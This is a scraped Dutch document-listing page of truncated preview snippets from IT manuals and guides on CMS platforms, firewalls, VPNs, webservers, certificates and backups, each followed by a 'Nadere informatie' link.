Zicht - Content Management Systeem een algemene beschrijving

Zicht - Content Management Systeem een algemene beschrijving Zicht - Content Management Systeem een algemene beschrijving Versie april/2008 Zicht nieuwe media ontwerpers 2008 1 Inleiding Een Content Management Systeem (CMS) is een webapplicatie waarmee je zonder

Nadere informatie

Handleiding Reinder.NET.Tasks.SQL versie 2

Handleiding Reinder.NET.Tasks.SQL versie 2 Handleiding Reinder.NET.Tasks.SQL versie 2 Reinder Stolte Tramstraat 33 8771RR Nijland Inhoudsopgave 1 Algemeen... 2 2 Installeren en configureren... 3 3 Taken instellen... 4 3.1 Taskname (Taaknaam) verplicht

Nadere informatie

IAAS HANDLEIDING - SOPHOS FIREWALL

IAAS HANDLEIDING - SOPHOS FIREWALL IAAS HANDLEIDING - SOPHOS FIREWALL Contents IAAS HANDLEIDING - SOPHOS FIREWALL... 0 HANDLEIDING - SOPHOS FIREWALL... 2 STANDAARD FUNCTIONALITEITEN... 2 DNS... 2 DHCP... 2 BASIS INSTELLINGEN UITVOEREN...

Nadere informatie

Handleiding Faxdiensten

Handleiding Faxdiensten Handleiding Faxdiensten Auteur: Marketing Datum: 01-10-2014 Versie: 2.0 Aantal bladen: 12 Nummer: 1018 2 P a g i n a Inhoud 1. Inleiding... 3 2. Beheer E-Fax IN- en E-Fax OUT-diensten... 4 3. E-Fax-overzicht...

Nadere informatie

Op de Virtual Appliance is MySQL voorgeïnstalleerd. MySQL is momenteel de meest gebruikte database op het internet.

Op de Virtual Appliance is MySQL voorgeïnstalleerd. MySQL is momenteel de meest gebruikte database op het internet. Het installeren van WordPress Nu je een volledig werkende virtuele server hebt is het tijd om er een applicatie op te installeren. We beginnen met de blogtool WordPress. De database De eerste stap is het

Nadere informatie

Inhoudsopgave. GlinQ: BattleField2 beheertool, Handleiding versie 1.0

Inhoudsopgave. GlinQ: BattleField2 beheertool, Handleiding versie 1.0 Inhoudsopgave Inleiding... 2 Key features... 2 Suggesties... 2 Inlog venster:... 3... 3... 3 General... 4... 4... 4 Advanced:... 5... 5... 5 Maplist:... 6... 6... 6 Players:... 7... 7... 7 Banlist:...

Nadere informatie

Je website (nog beter) beveiligen met HTTP-Security Headers

Je website (nog beter) beveiligen met HTTP-Security Headers Je website (nog beter) beveiligen met HTTP-Security Headers Wat is HTTP? Het HTTP (Hypertext Transfer Protocol) protocol is een vrij eenvoudig, tekst gebaseerd, protocol. Dit HTTP protocol regelt de communicatie

Nadere informatie

HANDLEIDING DMS Plugin Installatie, configuratie & werking

HANDLEIDING DMS Plugin Installatie, configuratie & werking HANDLEIDING DMS Plugin Installatie, configuratie & werking Dit document is de handleiding voor de installatie, configuratie en werking van de DMS Plugin. Versie 1-12/09/2005 Inhoudstafel 1 Installatie...

Nadere informatie

Handleiding Word Press voor de bewoners Westerkaap 1

Handleiding Word Press voor de bewoners Westerkaap 1 1 Handleiding Word Press voor de bewoners Westerkaap 1 Inhoud: Inloggen Pagina 1 Algemeen Pagina 2 Berichten Pagina 2 Bericht bewerken, Linken Pagina 3-4 Plaatje toevoegen bericht Pagina 5-6 Bericht publiceren

Nadere informatie

IdentySoft Pro In gebruik stelling EasySecure International B.V.

IdentySoft Pro In gebruik stelling EasySecure International B.V. IdentySoft Pro In gebruik stelling EasySecure International B.V. +31(0)88 0000 083 Info@EasySecure.nl www.easysecure.nl De IdentySoft Pro software van EasySecure International wordt altijd volledig voorgeconfigureerd

Nadere informatie

Werkinstructie. Technisch Beheer. uitvoeren MAP scan. voor. Datum: 15 oktober Versie: 1.0

Werkinstructie. Technisch Beheer. uitvoeren MAP scan. voor. Datum: 15 oktober Versie: 1.0 uitvoeren MAP scan voor Technisch Beheer Auteur: ValueBlue Datum: 15 oktober 2016 Versie: 1.0 uitvoeren MAP scan Page 2 / 22 Revisie status Versie Datum Naam Reden Veranderde items 1.0 15-10-2016 ValueBlue

Nadere informatie

SSL VPN. In deze handleiding zullen wij onderstaande SSL mogelijkheden aan u uitleggen. - SSL VPN account/groep creëren.

SSL VPN. In deze handleiding zullen wij onderstaande SSL mogelijkheden aan u uitleggen. - SSL VPN account/groep creëren. SSL VPN SSL VPN SSL VPN is een web based versie van VPN waarbij er geen VPN client software nodig is. Het wordt niet beperkt door netwerkomgevingen en is zeer eenvoudig te configureren. SSL staat voor

Nadere informatie

Handleiding Cryptoboss

Handleiding Cryptoboss 1 Handleiding Cryptoboss Inhoudsopgave Het opstarten van de cryptoboss 3 t/m 5 De eerste stap binnen Cryptoboss 6 t/m 7 Verbinding maken met Internet 8 Het gebruik binnen Cryptoboss 9 Wickr 10 t/m 11 Claws

Nadere informatie

Handleiding Wordpress

Handleiding Wordpress Handleiding Wordpress Inhoudsopgave 1. Inloggen 2. Berichten en Pagina s 3. Afbeeldingen en video s 4. Weblinks 1. Inloggen 1.1 Inloggen bij Wordpress We starten met het inloggen op je WordPress gebaseerde

Nadere informatie

Software Test Plan. Yannick Verschueren

Software Test Plan. Yannick Verschueren Software Test Plan Yannick Verschueren November 2014 Document geschiedenis Versie Datum Auteur/co-auteur Beschrijving 1 November 2014 Yannick Verschueren Eerste versie 1 Inhoudstafel 1 Introductie 3 1.1

Nadere informatie

Aandachtspunten voor installatie suse in vmware server

Aandachtspunten voor installatie suse in vmware server Aandachtspunten voor installatie suse in vmware server Voorbereiden van vware virtueel machine: 1. Select linux Suse linux 2. Maak disksize 5Gb Denk er als je virtual machine wilt draaien op FAT32 vink

Nadere informatie

- Plan Zo kun je een. website bouwen!

- Plan Zo kun je een. website bouwen! - Plan Zo kun je een website bouwen! BoekjeHoeKanJeEenWebsiteBouwen.i1 1 8-7-2008 17:23:14 BoekjeHoeKanJeEenWebsiteBouwen.i2 2 8-7-2008 17:23:15 In dit boekje staat de uitgebreide versie van hoe je een

Nadere informatie

6,2. Werkstuk door een scholier 1687 woorden 9 juni keer beoordeeld. Informatica

6,2. Werkstuk door een scholier 1687 woorden 9 juni keer beoordeeld. Informatica Werkstuk door een scholier 1687 woorden 9 juni 2011 6,2 101 keer beoordeeld Vak Informatica Inleiding in de gevaren van het internet In ons dagelijks leven gaat er tegenwoordig bijna geen dag voorbij zonder

Nadere informatie

Don-Neo Technologies TelePort. Master. Installatiehandleiding

Don-Neo Technologies TelePort. Master. Installatiehandleiding Don-Neo Technologies TelePort Master Installatiehandleiding Inleiding TelePort is een programma waarmee u op uitermate VEILIGE wijze berichten, bestanden en database mutaties kunt uitwisselen tussen computers

Nadere informatie

IIS - Installatie certificaat

IIS - Installatie certificaat IIS - Installatie certificaat Deze handleiding geldt voor IIS 7 en 8, er is een andere handleiding voor IIS 5 en 6 en Exchange 2000 en 2003. Na uitgifte ontvangt u het certificaat per e-mail. U kunt het

Nadere informatie

WebHare Professional en Enterprise

WebHare Professional en Enterprise WebHare Professional en Enterprise Systeem module Systeem configuratie handleiding Datum: 19 november 2002 Aantal pagina s: 20 Versie: 2.01 Doelgroep: Sysops Inhoudsopgave Inleiding... 1 1 Vooraf... 2

Nadere informatie

Cloud2 Online Backup - CrashplanPRO

Cloud2 Online Backup - CrashplanPRO Cloud2 Online Backup - CrashplanPRO Handleiding- CrashplanPRO - Online Backup Download de clients hier: Windows 32- bit: http://content.cloud2.nl/downloads/back01- cra.backupnoc.nl/crashplan_x86.exe Windows

Nadere informatie

SPACE ProAccess 2.0. Voor nadere toelichting kan contact opgenomen worden met SALTO.

SPACE ProAccess 2.0. Voor nadere toelichting kan contact opgenomen worden met SALTO. SPACE ProAccess 2.0 SALTO voorziet de partner van een document dat als checklist dient voor een juiste voorbereiding van de SALTO Web Software en de vereisten van het netwerk. Dit document is bedoeld voor

Nadere informatie

NACSPORT TAG&GO HANDLEIDING. 3.2.1. Eigenschappen knop

NACSPORT TAG&GO HANDLEIDING. 3.2.1. Eigenschappen knop Handleiding NACSPORT TAG&GO HANDLEIDING 1. Introductie 2. Configureren en bestellen 3. Sjabloon (categorieën en descriptors) 3.1 Lijst sjablonen 3.2 Sjablonen bewerken 3.2.1. Eigenschappen knop 4. Analyseren

Nadere informatie

USB Webserver installatie en gebruik

USB Webserver installatie en gebruik 2014 USB Webserver installatie en gebruik F. Vonk versie 2 14-8-2014 Inhoudsopgave 1. Inleiding... - 2-2. Installatie... - 3-3. USB Webserver... - 4-4. De MySQL omgeving... - 5-5. Een PHP script runnen...

Nadere informatie

Chapter 4. eenvoudige webserver opzetten

Chapter 4. eenvoudige webserver opzetten Chapter 4. eenvoudige webserver opzetten Table of Contents 4.1. overzicht... 44 4.2. software beheren op Linux... 44 4.3. vi... 45 4.4. html... 45 4.5. apache2... 45 4.6. twee extra websites op de apache

Nadere informatie

1. Hardware Installatie...3 2. Installatie van Quasyscan...6 A. Hoe controleren of je een actieve internetverbinding hebt?...6 B.

1. Hardware Installatie...3 2. Installatie van Quasyscan...6 A. Hoe controleren of je een actieve internetverbinding hebt?...6 B. Quasyscan 1. Hardware Installatie...3 2. Installatie van Quasyscan...6 A. Hoe controleren of je een actieve internetverbinding hebt?...6 B. Zodra er een internetverbinding tot stand is gebracht...7 C.

Nadere informatie

ProjectHeatmap. Onderzoeksrapport v0.5 11-03-11 Dennis Wagenaar

ProjectHeatmap. Onderzoeksrapport v0.5 11-03-11 Dennis Wagenaar ProjectHeatmap Onderzoeksrapport v0.5 11-03-11 Dennis Wagenaar 1 Inhoudsopgave Inleiding...3 Gheat...4 Info...4 Voordelen...4 Nadelen...4 Google Fusion Tables...5 Info...5 Voordelen...5 Nadelen...5 OLHeatmap...6

Nadere informatie

Globale kennismaking

Globale kennismaking Globale kennismaking Kennismaking Tesla CMS 1. Dashboard 2. pagina beheer - pagina aanmaken - pagina aanpassen - pagina verwijderen - pagina seo opties - zichtbaarheid pagina 3. subpagina beheer - subpagina

Nadere informatie

Het Wepsysteem. Het Wepsysteem wordt op maat gebouwd, gekoppeld aan de gewenste functionaliteiten en lay-out van de site. Versie september 2010

Het Wepsysteem. Het Wepsysteem wordt op maat gebouwd, gekoppeld aan de gewenste functionaliteiten en lay-out van de site. Versie september 2010 Het Wepsysteem Het Wepsysteem is een content management systeem, een systeem om zonder veel kennis van html of andere internettalen een website te onderhouden en uit te breiden. Met het Content Management

Nadere informatie

Temperatuur logger synchronisatie

Temperatuur logger synchronisatie Temperatuur logger synchronisatie Juni 10, 2010 1 / 7 Temperatuur logger synchronisatie Introductie Twee of meerdere ontvangers van het Multilogger systeem kunnen met de temperature logger synchronisatie

Nadere informatie

Korte uitleg: Wat doet de shell met mijn commandoregel?

Korte uitleg: Wat doet de shell met mijn commandoregel? Korte uitleg: Wat doet de shell met mijn commandoregel? Het onderstaande is heel erg Bash gericht, maar geldt i.h.a. ook voor andere shells. Vooral als het om "begrip" gaat. Iedere regel die aan de shell

Nadere informatie

IP CAMERA HANDLEIDING

IP CAMERA HANDLEIDING IP CAMERA HANDLEIDING Voorwoord Allereerst bedankt voor uw aankoop van een van de Q24U draadloze IP- netwerkcamera (s). Deze handleiding geeft informatie over de installatie en de mogelijkheden van de

Nadere informatie

Dutch / Nederlands. Versie 1.2

Dutch / Nederlands. Versie 1.2 Dutch / Nederlands Versie 1.2 SX OS Kenmerken Werkt met elk type Switch SX OS werkt met elke Nintendo Switch en met elke Software versie (firmware). Speel elk Spel Met SX OS Speel je al je favoriete spellen

Nadere informatie

Inhoudsopgave. versie 0.8

Inhoudsopgave. versie 0.8 JOOMLA! INSTALLATIE HANDLEIDING versie 0.8 Inhoudsopgave Stappenplan...3 Inrichten database...4 Configuratiecentrum cpanel...4 Aanmaken van een database gebruiker...5 Aanmaken van een database...6 Gebruiker

Nadere informatie

SSL VPN. In deze handleiding zullen wij onderstaande SSL mogelijkheden aan u uitleggen. - SSL VPN account/groep creëren.

SSL VPN. In deze handleiding zullen wij onderstaande SSL mogelijkheden aan u uitleggen. - SSL VPN account/groep creëren. SSL VPN SSL VPN SSL VPN is een web based versie van VPN waarbij er geen VPN client software nodig is. Het wordt niet beperkt door netwerkomgevingen en is zeer eenvoudig te configureren. SSL staat voor

Nadere informatie

JOOMLA! GEBRUIKSVRIENDELIJKHEID IN DE PRAKTIJK. Tips en hulpmiddelen voor gebruiksvriendelijkheid

JOOMLA! GEBRUIKSVRIENDELIJKHEID IN DE PRAKTIJK. Tips en hulpmiddelen voor gebruiksvriendelijkheid JOOMLA! GEBRUIKSVRIENDELIJKHEID IN DE PRAKTIJK Tips en hulpmiddelen voor gebruiksvriendelijkheid JOOMLA! GEBRUIKSVRIENDELIJKHEID IN DE PRAKTIJK 10 tips om joomla gebruiksvriendelijker te maken Sander Potjer

Nadere informatie

UNIX FAQ. Migratie naar een nieuwe server

UNIX FAQ. Migratie naar een nieuwe server UNIX FAQ Migratie naar een nieuwe server Shared Hosting Unix FAQ v5 NL 28032006 Pagina 1/13 Inhoudstafel 1. Inleiding...3 2. Inloggen...3 3. Register_globals in PHP...4 3.1 Wat is de optie register_globals

Nadere informatie

Het installeren van de software.

Het installeren van de software. Inhoudsopgave Inhoudsopgave... 1 Het installeren van de software.... 2 De Printserver Bekabeld Configureren... 8 Instellen van je IP adres... 10 Netwerk poorten configureren... 12 Een printer Toevoegen....

Nadere informatie

Stappenplan Scannen. Hoe te scannen: Start het programma ABBYY Finereader op

Stappenplan Scannen. Hoe te scannen: Start het programma ABBYY Finereader op Stappenplan scannen Hoe te scannen: Start het programma ABBYY Finereader op Het programma ABBYY Finereader is een programma waarmee makkelijk gescand kan worden. Het zorgt voor de OCR omzetting. Dit wil

Nadere informatie

Quickstart handleiding

Quickstart handleiding Inleiding Allereerst hartelijk bedankt voor het aanschaffen van. U heeft met deze aankoop een goede keuze gemaakt voor een zeer professionele E-mail marketing tool. In deze quickstart handleiding zullen

Nadere informatie

Handleiding PHP en MySQL onder Windows Server 2003 met IIS 6.0

Handleiding PHP en MySQL onder Windows Server 2003 met IIS 6.0 Handleiding PHP en MySQL onder Windows Server 2003 met IIS 6.0 Uitgegeven door Propane Internetdiensten Lange Meet 41 3261 EJ OUD-BEIJERLAND 2005 Propane Internetdiensten Inhoud 1. Inleiding... 3 2. IIS

Nadere informatie

design ook items uitsnijden

design ook items uitsnijden (fig1) Hulplijnen zetten Om het ontwerp netjes uit te snijden is het handig om eerst hulplijnen te zetten. (fig1) Nu is het zaak om eerst voor je zelf te bepalen wat is layout en wat is design. Al het

Nadere informatie

Augustus& Handleiding - Publisher Tool 3

Augustus& Handleiding - Publisher Tool 3 Augustus& 15 16 Handleiding - Publisher Tool 3 Inhoudsopgave 1. Welkom... 3 1.1 Inloggen... 3 1.2 Dashboard... 4 2. Boeken... 5 2.1 Boeken aanmaken... 5 2.2 Het bewerken van boekinformatie.... 7 3. Verrijkingen...

Nadere informatie

Installatie Solid Edge ST5

Installatie Solid Edge ST5 Installatie Solid Edge ST5! NEEM DIT DOCUMENT DOOR VOORDAT U UW HUIDIGE SOLID EDGE VERSIE GAAT VERWIJDEREN! LET OP!! SOLID EDGE ST5 KUNT U NIET MEER OP WINDOWS XP INSTALLEREN LET OP!! DE ST5 LICENSE MANAGER

Nadere informatie

Versturen van email vanuit een Delphi VCL toepassing

Versturen van email vanuit een Delphi VCL toepassing Versturen van email vanuit een Delphi VCL toepassing Voor Delphi bestaan uiteraard verschillende libraries om emails te versturen, maar in dit voorbeeld wordt een C# Dotnet library gebruikt en aangesproken

Nadere informatie

Handleiding website. Inloggen Start uw internet browser en ga naar http://www.rbaoreven.nl/. Laatst bijgewerkt: 17 mei 2008

Handleiding website. Inloggen Start uw internet browser en ga naar http://www.rbaoreven.nl/. Laatst bijgewerkt: 17 mei 2008 Handleiding website Laatst bijgewerkt: 17 mei 2008 In deze handleiding staat alles wat u nodig heeft om een bericht op de website van de Reddingsbrigade Aoreven Heythuysen te plaatsen. Alles wordt in woord

Nadere informatie

TeD Tekst en Design. Basisinformatie voor gebruik van het cms Made Simple

TeD Tekst en Design. Basisinformatie voor gebruik van het cms Made Simple TeD Tekst en Design Basisinformatie voor gebruik van het cms Made Simple Klant: ----- Auteur: TeD Tekst en Design Datum: Mei 2009 TeD Tekst en Design Inhoudsopgave 1 Inleiding...3 2 Inloggen in het CMS...4

Nadere informatie

AdBackup Pro November 2015 AdBackup Pro 6.13 is beschikbaar op het platform Oodrive Vision en als een op zichzelf staand product AdBackup Pro

AdBackup Pro November 2015 AdBackup Pro 6.13 is beschikbaar op het platform Oodrive Vision en als een op zichzelf staand product AdBackup Pro AdBackup Pro 6.13 - November 2015 AdBackup Pro 6.13 is beschikbaar op het platform Oodrive Vision en als een op zichzelf staand product AdBackup Pro Pagina 1 van 6 INDEX VAN DE FUNCTIES 1. HERZIENING VAN

Nadere informatie

5/8 Patch management

5/8 Patch management Management Services 5/8 Patch management 5/8.1 Beheer van patches met Subscription Management Tool 5/8.1.1 Inleiding Een moderne Linux-server moet regelmatig worden bijgewerkt met de laatste versie van

Nadere informatie

Sick Beard installeren en configureren voor gebruik in combinatie met SABnzbd+...

Sick Beard installeren en configureren voor gebruik in combinatie met SABnzbd+... pagina 1 van 6 Sick Beard installeren en configureren voor gebruik in combinatie met SABnzbd+ (Windows) Introductie Sick Beard is een stukje software wat heel wat werk uit handen kan nemen. Het weet welke

Nadere informatie

Webhosting Online Beginnen met Joomla v1.0

Webhosting Online Beginnen met Joomla v1.0 Webhosting Online Beginnen met Joomla v1.0 1 Inleiding KPN stelt met een abonnement op Webhosting Online Linux gratis het content management systeem Joomla voor u beschikbaar. Dit populaire programma om

Nadere informatie

Handleiding Joomla CMS

Handleiding Joomla CMS Handleiding Joomla CMS Inhoudsopgave Inloggen bij de beheeromgeving 3 Artikelen 4 Prullenbak bekijken 4 Nieuw artikel maken / bewerken 5 Afbeelding toevoegen aan artikel 6 Link in een artikel plaatsen

Nadere informatie

SPACE ProAccess 3.0. Voor nadere toelichting kan contact opgenomen worden met SALTO.

SPACE ProAccess 3.0. Voor nadere toelichting kan contact opgenomen worden met SALTO. SPACE ProAccess 3.0 SALTO voorziet de partner van een document dat als checklist dient voor een juiste voorbereiding van de SALTO Web Software en de vereisten van het netwerk. Dit document is bedoeld voor

Nadere informatie

Degrande Frederik COMPUTER OVERNEMEN januari 2005

Degrande Frederik COMPUTER OVERNEMEN januari 2005 Een computer via internet overnemen Via internet kun je de bediening van een computer overnemen. Heel handig, als je iemand met een probleem wil helpen of iets wil demonstreren. Soms is het zeer handig

Nadere informatie

5/5 Red Carpet. 5/5.1 Inleiding

5/5 Red Carpet. 5/5.1 Inleiding Management Services 5/5 Red Carpet 5/5.1 Inleiding Met de overname van Ximian is Novell ook eigenaar geworden van de Red Carpet-technologie. Hoewel het aannemelijk is dat het hier een tijdelijke oplossing

Nadere informatie

Die vraag krijg ik regelmatig. De meest voorkomende situaties zijn deze:

Die vraag krijg ik regelmatig. De meest voorkomende situaties zijn deze: Hoe verhuis je een WordPress website? Die vraag krijg ik regelmatig. De meest voorkomende situaties zijn deze: Iemand heeft een WordPress website en stapt over naar een andere webhost (meestal blijft het

Nadere informatie